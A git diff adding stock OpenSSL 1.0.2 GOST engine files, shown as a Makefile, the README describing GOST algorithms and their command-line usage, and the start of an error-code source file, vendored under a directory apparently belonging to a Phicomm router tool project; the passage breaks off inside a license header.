+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/Makefile.save
@@ -0,0 +1,274 @@
+DIR=ccgost
+TOP=../..
+CC=cc
+INCLUDES= -I../../include
+CFLAG=-g
+MAKEFILE= Makefile
+AR= ar r
+CFLAGS= $(INCLUDES) $(CFLAG)
+LIB=$(TOP)/libcrypto.a
+
+LIBSRC= gost2001.c gost2001_keyx.c gost89.c gost94_keyx.c gost_ameth.c gost_asn1.c gost_crypt.c gost_ctl.c gost_eng.c gosthash.c gost_keywrap.c gost_md.c gost_params.c gost_pmeth.c gost_sign.c
+
+LIBOBJ= e_gost_err.o gost2001_keyx.o gost2001.o gost89.o gost94_keyx.o gost_ameth.o gost_asn1.o gost_crypt.o gost_ctl.o gost_eng.o gosthash.o gost_keywrap.o gost_md.o gost_params.o gost_pmeth.o gost_sign.o
+
+SRC=$(LIBSRC)
+
+LIBNAME=gost
+
+top: 
+	(cd $(TOP); $(MAKE) DIRS=engines EDIRS=$(DIR) sub_all)
+
+all: lib
+
+tags:
+	ctags $(SRC)
+
+errors:
+	$(PERL) ../../util/mkerr.pl -conf gost.ec -nostatic -write $(SRC)
+
+lib: $(LIBOBJ)
+	if [ -n "$(SHARED_LIBS)" ]; then \
+		$(MAKE) -f $(TOP)/Makefile.shared -e \
+			LIBNAME=$(LIBNAME) \
+			LIBEXTRAS='$(LIBOBJ)' \
+			LIBDEPS='-L$(TOP) -lcrypto' \
+			link_o.$(SHLIB_TARGET); \
+	else \
+		$(AR) $(LIB) $(LIBOBJ); \
+	fi
+	@touch lib
+
+install:
+	[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	if [ -n "$(SHARED_LIBS)" ]; then \
+		set -e; \
+		echo installing $(LIBNAME); \
+		pfx=lib; \
+		if expr "$(PLATFORM)" : "Cygwin" >/dev/null; then \
+			sfx=".so"; \
+			cp cyg$(LIBNAME).dll $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/engines/$${pfx}$(LIBNAME)$$sfx.new; \
+		else \
+			case "$(CFLAGS)" in \
+			*DSO_BEOS*) sfx=".so";; \
+			*DSO_DLFCN*) sfx=`expr "$(SHLIB_EXT)" : '.*\(\.[a-z][a-z]*\)' \| ".so"`;; \
+			*DSO_DL*) sfx=".sl";; \
+			*DSO_WIN32*) sfx="eay32.dll"; pfx=;; \
+			*) sfx=".bad";; \
+			esac; \
+			cp $${pfx}$(LIBNAME)$$sfx $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/engines/$${pfx}$(LIBNAME)$$sfx.new; \
+		fi; \
+		chmod 555 $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/engines/$${pfx}$(LIBNAME)$$sfx.new; \
+		mv -f $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/engines/$${pfx}$(LIBNAME)$$sfx.new $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/engines/$${pfx}$(LIBNAME)$$sfx; \
+	fi
+
+links:
+
+tests:
+
+depend:
+	@if [ -z "$(THIS)" ]; then \
+	    $(MAKE) -f $(TOP)/Makefile reflect THIS=$@; \
+	else \
+	    $(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC); \
+	fi
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff *.so *.sl *.dll
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+gost2001.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+gost2001.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+gost2001.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+gost2001.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+gost2001.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+gost2001.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+gost2001.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+gost2001.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+gost2001.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+gost2001.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+gost2001.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+gost2001.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+gost2001.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+gost2001.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+gost2001.o: e_gost_err.h gost2001.c gost89.h gost_lcl.h gost_params.h
+gost2001.o: gosthash.h
+gost2001_keyx.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+gost2001_keyx.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+gost2001_keyx.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+gost2001_keyx.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+gost2001_keyx.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+gost2001_keyx.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+gost2001_keyx.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+gost2001_keyx.o: ../../include/openssl/obj_mac.h
+gost2001_keyx.o: ../../include/openssl/objects.h
+gost2001_keyx.o: ../../include/openssl/opensslconf.h
+gost2001_keyx.o: ../../include/openssl/opensslv.h
+gost2001_keyx.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+gost2001_keyx.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+gost2001_keyx.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+gost2001_keyx.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+gost2001_keyx.o: ../../include/openssl/x509_vfy.h e_gost_err.h gost2001_keyx.c
+gost2001_keyx.o: gost2001_keyx.h gost89.h gost_keywrap.h gost_lcl.h gosthash.h
+gost89.o: gost89.c gost89.h
+gost94_keyx.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+gost94_keyx.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+gost94_keyx.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+gost94_keyx.o: ../../include/openssl/dh.h ../../include/openssl/dsa.h
+gost94_keyx.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+gost94_keyx.o: ../../include/openssl/ecdh.h ../../include/openssl/ecdsa.h
+gost94_keyx.o: ../../include/openssl/engine.h ../../include/openssl/evp.h
+gost94_keyx.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+gost94_keyx.o: ../../include/openssl/objects.h
+gost94_keyx.o: ../../include/openssl/opensslconf.h
+gost94_keyx.o: ../../include/openssl/opensslv.h
+gost94_keyx.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+gost94_keyx.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+gost94_keyx.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+gost94_keyx.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+gost94_keyx.o: ../../include/openssl/x509_vfy.h e_gost_err.h gost89.h
+gost94_keyx.o: gost94_keyx.c gost_keywrap.h gost_lcl.h gosthash.h
+gost_ameth.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+gost_ameth.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+gost_ameth.o: ../../include/openssl/buffer.h ../../include/openssl/cms.h
+gost_ameth.o: ../../include/openssl/crypto.h ../../include/openssl/dsa.h
+gost_ameth.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+gost_ameth.o: ../../include/openssl/ecdh.h ../../include/openssl/ecdsa.h
+gost_ameth.o: ../../include/openssl/engine.h ../../include/openssl/err.h
+gost_ameth.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+gost_ameth.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+gost_ameth.o: ../../include/openssl/opensslconf.h
+gost_ameth.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+gost_ameth.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+gost_ameth.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+gost_ameth.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+gost_ameth.o: ../../include/openssl/x509_vfy.h e_gost_err.h gost89.h
+gost_ameth.o: gost_ameth.c gost_lcl.h gost_params.h gosthash.h
+gost_asn1.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+gost_asn1.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+gost_asn1.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+gost_asn1.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+gost_asn1.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+gost_asn1.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+gost_asn1.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+gost_asn1.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+gost_asn1.o: ../../include/openssl/opensslconf.h
+gost_asn1.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+gost_asn1.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+gost_asn1.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+gost_asn1.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+gost_asn1.o: ../../include/openssl/x509_vfy.h gost89.h gost_asn1.c gost_lcl.h
+gost_asn1.o: gosthash.h
+gost_crypt.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+gost_crypt.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+gost_crypt.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+gost_crypt.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+gost_crypt.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+gost_crypt.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+gost_crypt.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+gost_crypt.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+gost_crypt.o: ../../include/openssl/opensslconf.h
+gost_crypt.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+gost_crypt.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+gost_crypt.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+gost_crypt.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+gost_crypt.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+gost_crypt.o: e_gost_err.h gost89.h gost_crypt.c gost_lcl.h gosthash.h
+gost_ctl.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+gost_ctl.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+gost_ctl.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+gost_ctl.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+gost_ctl.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+gost_ctl.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+gost_ctl.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+gost_ctl.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+gost_ctl.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+gost_ctl.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+gost_ctl.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+gost_ctl.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+gost_ctl.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+gost_ctl.o: ../../include/openssl/x509_vfy.h gost89.h gost_ctl.c gost_lcl.h
+gost_ctl.o: gosthash.h
+gost_eng.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+gost_eng.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+gost_eng.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+gost_eng.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+gost_eng.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+gost_eng.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+gost_eng.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+gost_eng.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+gost_eng.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+gost_eng.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+gost_eng.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+gost_eng.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+gost_eng.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+gost_eng.o: ../../include/openssl/x509_vfy.h e_gost_err.h gost89.h gost_eng.c
+gost_eng.o: gost_lcl.h gosthash.h
+gost_keywrap.o: gost89.h gost_keywrap.c gost_keywrap.h
+gost_md.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+gost_md.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+gost_md.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+gost_md.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+gost_md.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+gost_md.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+gost_md.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+gost_md.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+gost_md.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+gost_md.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+gost_md.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+gost_md.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+gost_md.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+gost_md.o: e_gost_err.h gost89.h gost_lcl.h gost_md.c gosthash.h
+gost_params.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+gost_params.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+gost_params.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+gost_params.o: ../../include/openssl/opensslconf.h
+gost_params.o: ../../include/openssl/opensslv.h
+gost_params.o: ../../include/openssl/ossl_typ.h
+gost_params.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+gost_params.o: ../../include/openssl/symhacks.h gost_params.c gost_params.h
+gost_pmeth.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+gost_pmeth.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+gost_pmeth.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+gost_pmeth.o: ../../include/openssl/crypto.h ../../include/openssl/dsa.h
+gost_pmeth.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+gost_pmeth.o: ../../include/openssl/ecdh.h ../../include/openssl/ecdsa.h
+gost_pmeth.o: ../../include/openssl/engine.h ../../include/openssl/evp.h
+gost_pmeth.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+gost_pmeth.o: ../../include/openssl/objects.h
+gost_pmeth.o: ../../include/openssl/opensslconf.h
+gost_pmeth.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+gost_pmeth.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+gost_pmeth.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+gost_pmeth.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+gost_pmeth.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+gost_pmeth.o: e_gost_err.h gost89.h gost_lcl.h gost_params.h gost_pmeth.c
+gost_pmeth.o: gosthash.h
+gost_sign.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+gost_sign.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+gost_sign.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+gost_sign.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+gost_sign.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+gost_sign.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+gost_sign.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+gost_sign.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+gost_sign.o: ../../include/openssl/opensslconf.h
+gost_sign.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+gost_sign.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+gost_sign.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+gost_sign.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+gost_sign.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+gost_sign.o: e_gost_err.h gost89.h gost_lcl.h gost_params.h gost_sign.c
+gost_sign.o: gosthash.h
+gosthash.o: gost89.h gosthash.c gosthash.h
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/README.gost b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/README.gost
new file mode 100644
index 0000000..c96cccc
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/README.gost
@@ -0,0 +1,300 @@
+GOST ENGINE
+
+This engine provides implementation of Russian cryptography standard.
+This is also an example of adding new cryptoalgorithms into OpenSSL
+without changing its core. If OpenSSL is compiled with dynamic engine
+support, new algorithms can be added even without recompilation of
+OpenSSL and applications which use it.
+
+ALGORITHMS SUPPORTED
+
+GOST R 34.10-94 and GOST R 34.10-2001 - digital signature algorithms.
+   Also support key exchange based on public keys. See RFC 4357 for
+   details of VKO key exchange algorithm. These algorithms use
+   256 bit private keys. Public keys are 1024 bit for 94 and 512 bit for
+   2001 (which is elliptic-curve based). Key exchange algorithms
+   (VKO R 34.10) are supported on these keys too.
+   
+GOST R 34.11-94  Message digest algorithm. 256-bit hash value
+
+GOST 28147-89 - Symmetric cipher  with 256-bit key. Various modes are
+   defined in the standard, but only CFB and CNT modes are implemented
+   in the engine. To make statistical analysis more difficult, key
+   meshing is supported (see RFC 4357).
+
+GOST 28147-89 MAC mode. Message authentication code. While most MAC
+    algorithms  out there are based on hash functions using HMAC
+	algorithm, this algoritm is based on symmetric cipher. 
+	It has 256-bit symmetric key and only 32 bits of MAC value
+	(while HMAC has same key size and value size). 
+
+	It is implemented as combination of EVP_PKEY type and EVP_MD type.
+
+USAGE OF THESE ALGORITHMS
+
+This engine is designed to allow usage of this algorithms in the
+high-level openssl functions, such as PKI, S/MIME and TLS.
+
+See RFC 4490 for S/MIME with GOST algorithms and RFC 4491 for PKI.
+TLS support is implemented according IETF
+draft-chudov-cryptopro-cptls-03.txt and is compatible with
+CryptoPro CSP 3.0 and 3.6 as well as with MagPro CSP. 
+GOST ciphersuites implemented in CryptoPro CSP 2.0 are not supported
+because they use ciphersuite numbers used now by AES ciphersuites.
+
+To use the engine you have to load it via openssl configuration
+file. Applications should read openssl configuration file or provide
+their own means to load engines. Also, applications which operate with
+private keys, should use generic EVP_PKEY API instead of using RSA or
+other algorithm-specific API.
+
+CONFIGURATION FILE
+
+Configuration file should include following statement in the global
+section, i.e. before first bracketed section header (see config(5) for details)
+
+   openssl_conf = openssl_def
+
+where openssl_def is name of the section in configuration file which
+describes global defaults.
+
+This section should contain following statement:
+
+   [openssl_def]
+   engines = engine_section
+
+which points to the section which describes list of the engines to be
+loaded. This section should contain:
+
+	[engine_section]
+	gost = gost_section
+
+And section which describes configuration of the engine should contain
+
+	[gost_section]
+	engine_id = gost
+	dynamic_path = /usr/lib/ssl/engines/libgost.so
+	default_algorithms = ALL
+	CRYPT_PARAMS = id-Gost28147-89-CryptoPro-A-ParamSet
+
+Where engine_id parameter specifies name of engine (should be "gost").
+dynamic_path is a location of the loadable shared library implementing the
+engine. If the engine is compiled statically or is located in the OpenSSL
+engines directory, this line can be omitted. 
+default_algorithms parameter specifies that all algorithms, provided by
+engine, should be used.
+
+The CRYPT_PARAMS parameter is engine-specific. It allows the user to choose
+between different parameter sets of symmetric cipher algorithm. RFC 4357
+specifies several parameters for the GOST 28147-89 algorithm, but OpenSSL
+doesn't provide user interface to choose one when encrypting. So use engine
+configuration parameter instead.
+
+Value of this parameter can be either short name, defined in OpenSSL
+obj_dat.h header file or numeric representation of OID, defined in RFC
+4357. 
+
+USAGE WITH COMMAND LINE openssl UTILITY
+
+1. Generation of private key
+
+	openssl genpkey -algorithm gost2001 -pkeyopt paramset:A -out seckey.pem
+
+  Use -algorithm option to specify algorithm.
+  Use -pkeyopt option to pass paramset to algorithm. The following paramsets
+  are supported by 
+  	gost94: 0,A,B,C,D,XA,XB,XC
+	gost2001: 0,A,B,C,XA,XB
+  You can also use numeric representation of OID as to destinate
+  paramset.
+
+  Paramsets starting with X are intended to use for key exchange keys.
+  Paramsets without X are for digital signature keys.
+
+  Paramset for both algorithms 0 is the test paramset which should be used
+  only for test purposes.
+
+There are no algorithm-specific things with generation of certificate
+request once you have a private key.
+
+2. Generation of certificate request along with private/public keypar
+
+   openssl req -newkey gost2001 -pkeyopt paramset:A
+
+   Syntax of -pkeyopt parameter is identical with genpkey command.
+
+   You can also use oldstyle syntax -newkey gost2001:paramfile, but in
+   this case you should create parameter file first. 
+
+   It can be created with
+
+   openssl genpkey -genparam -algorithm gost2001 -pkeyopt paramset:A\
+      -out paramfile.
+
+3. S/MIME operations
+
+If you want to send encrypted mail using GOST algorithms, don't forget
+to specify -gost89 as encryption algorithm for OpenSSL smime command.
+While OpenSSL is clever enough to find out that GOST R 34.11-94 digest
+must be used for digital signing with GOST private key, it have no way
+to derive symmetric encryption algorithm from key exchange keys.
+
+4. TLS operations
+
+OpenSSL supports all four ciphersuites defined in the IETF draft.
+Once you've loaded GOST key and certificate into your TLS server,
+ciphersuites which use GOST 28147-89 encryption are enabled.
+
+Ciphersuites with NULL encryption should be enabled explicitely if
+needed.
+
+GOST2001-GOST89-GOST89 Uses GOST R 34.10-2001 for auth and key exchange
+		GOST 28147-89 for encryption and GOST 28147-89 MAC
+GOST94-GOST89-GOST89 Uses GOST R 34.10-94 for auth and key exchange
+		GOST 28147-89 for encryption and GOST 28147-89 MAC
+GOST2001-NULL-GOST94 Uses GOST R 34.10-2001 for auth and key exchange,
+        no encryption and HMAC, based on GOST R 34.11-94
+GOST94-NULL-GOST94 Uses GOST R 34.10-94 for auth and key exchange,
+        no encryption and HMAC, based on GOST R 34.11-94
+
+Gost 94 and gost 2001 keys can be used simultaneously in the TLS server.
+RSA, DSA and EC keys can be used simultaneously with GOST keys, if
+server implementation supports loading more than two private
+key/certificate pairs. In this case ciphersuites which use any of loaded
+keys would be supported and clients can negotiate ones they wish.
+
+This allows creation of TLS servers which use GOST ciphersuites for
+Russian clients and RSA/DSA ciphersuites for foreign clients.
+
+5. Calculation of digests and symmetric encryption
+ OpenSSL provides specific commands (like sha1, aes etc) for calculation
+ of digests and symmetric encryption. Since such commands cannot be
+ added dynamically, no such commands are provided for GOST algorithms.
+ Use generic commands 'dgst' and 'enc'.
+
+ Calculation of GOST R 34.11-94 message digest
+
+ openssl dgst -md_gost94 datafile
+
+ Note that GOST R 34.11-94 specifies that digest value should be
+ interpreted as little-endian number, but OpenSSL outputs just hex dump
+ of digest value.
+
+ So, to obtain correct digest value, such as produced by gostsum utility
+ included in the engine distribution, bytes of output should be
+ reversed.
+ 
+ Calculation of HMAC based on GOST R 34.11-94
+
+ openssl dgst -md_gost94 -mac hmac -macopt key:<32 bytes of key> datafile
+  
+  (or use hexkey if key contain NUL bytes)
+ Calculation of GOST 28147 MAC
+
+ openssl dgst -mac gost-mac -macopt key:<32 bytes of key> datafile
+
+ Note absense of an option that specifies digest algorithm. gost-mac
+ algorithm supports only one digest (which is actually part of
+ implementation of this mac) and OpenSSL is clever enough to find out
+ this.
+
+ Encryption with GOST 28147 CFB mode
+ openssl enc -gost89 -out encrypted-file -in plain-text-file -k <passphrase>  
+ Encryption with GOST 28147 CNT mode
+ openssl enc -gost89-cnt -out encrypted-file -in plain-text-file -k <passphrase>
+
+
+6. Encrypting private keys and PKCS12
+
+To produce PKCS12 files compatible with MagPro CSP, you need to use
+GOST algorithm for encryption of PKCS12 file and also GOST R 34.11-94
+hash to derive key from password.
+
+openssl pksc12 -export -inkey gost.pem -in gost_cert.pem -keypbe gost89\
+   -certpbe gost89 -macalg md_gost94
+ 
+7. Testing speed of symmetric ciphers.
+   
+To test performance of GOST symmetric ciphers you should use -evp switch
+of the openssl speed command. Engine-provided ciphers couldn't be
+accessed by cipher-specific functions, only via generic evp interface
+
+ openssl speed -evp gost89
+ openssl speed -evp gost89-cnt
+
+
+PROGRAMMING INTERFACES DETAILS
+
+Applications never should access engine directly. They only use provided
+EVP_PKEY API. But there are some details, which should be taken into
+account.
+
+EVP provides two kinds of API for key exchange:
+
+1. EVP_PKEY_encrypt/EVP_PKEY_decrypt functions, intended to use with
+	RSA-like public key encryption algorithms
+
+2. EVP_PKEY_derive, intended to use with Diffie-Hellman-like shared key
+computing algorithms.
+
+Although VKO R 34.10 algorithms, described in the RFC 4357 are
+definitely second case, engine provides BOTH API for GOST R 34.10 keys.
+
+EVP_PKEY_derive just invokes appropriate VKO algorithm and computes
+256 bit shared key. VKO R 34.10-2001 requires 64 bits of random user key
+material (UKM). This UKM should be transmitted to other party, so it is
+not generated inside derive function.
+
+It should be set by EVP_PKEY_CTX_ctrl function using
+EVP_PKEY_CTRL_SET_IV command after call of EVP_PKEY_derive_init, but
+before EVP_PKEY_derive.
+	unsigned char ukm[8];
+	RAND_bytes(ukm,8);
+   EVP_PKEY_CTX_ctrl(ctx, -1, EVP_PKEY_OP_DERIVE, 8, ukm)
+
+EVP_PKEY_encrypt encrypts provided session key with VKO shared key and
+packs it into GOST key transport structure, described in the RFC 4490.
+
+It typically uses ephemeral key pair to compute shared key and packs its
+public part along with encrypted key. So, for most cases use of 
+EVP_PKEY_encrypt/EVP_PKEY_decrypt with GOST keys is almost same as with
+RSA.
+
+However, if peerkey field in the EVP_PKEY_CTX structure is set (using
+EVP_PKEY_derive_set_peerkey function) to EVP_PKEY structure which has private
+key and uses same parameters as the public key from which this EVP_PKEY_CTX is
+created, EVP_PKEY_encrypt will use this private key to compute shared key and
+set ephemeral key in the GOST_key_transport structure to NULL. In this case
+pkey and peerkey fields in the EVP_PKEY_CTX are used upside-down.
+
+If EVP_PKEY_decrypt encounters GOST_key_transport structure with NULL
+public key field, it tries to use peerkey field from the context to
+compute shared key. In this case peerkey field should really contain
+peer public key.
+
+Encrypt operation supports EVP_PKEY_CTRL_SET_IV operation as well.
+It can be used when some specific restriction on UKM are imposed by
+higher level protocol. For instance, description of GOST ciphersuites
+requires UKM to be derived from shared secret. 
+
+If UKM is not set by this control command, encrypt operation would
+generate random UKM.
+
+
+This sources include implementation of GOST 28147-89 and GOST R 34.11-94
+which are completely indepentent from OpenSSL and can be used separately
+(files gost89.c, gost89.h, gosthash.c, gosthash.h) Utility gostsum (file
+gostsum.c) is provided as example of such separate usage. This is
+program, simular to md5sum and sha1sum utilities, but calculates GOST R
+34.11-94 hash.
+
+Makefile doesn't include rule for compiling gostsum.
+Use command
+
+$(CC) -o gostsum gostsum.c gost89.c gosthash.c
+where $(CC) is name of your C compiler.
+
+Implementations of GOST R 34.10-xx, including VKO algorithms heavily
+depends on OpenSSL BIGNUM and Elliptic Curve libraries.
+
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/e_gost_err.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/e_gost_err.c
new file mode 100644
index 0000000..3201b64
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/e_gost_err.c
@@ -0,0 +1,220 @@
+/* e_gost_err.c */
+/* ====================================================================
+ * Copyright (c) 1999-2009 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
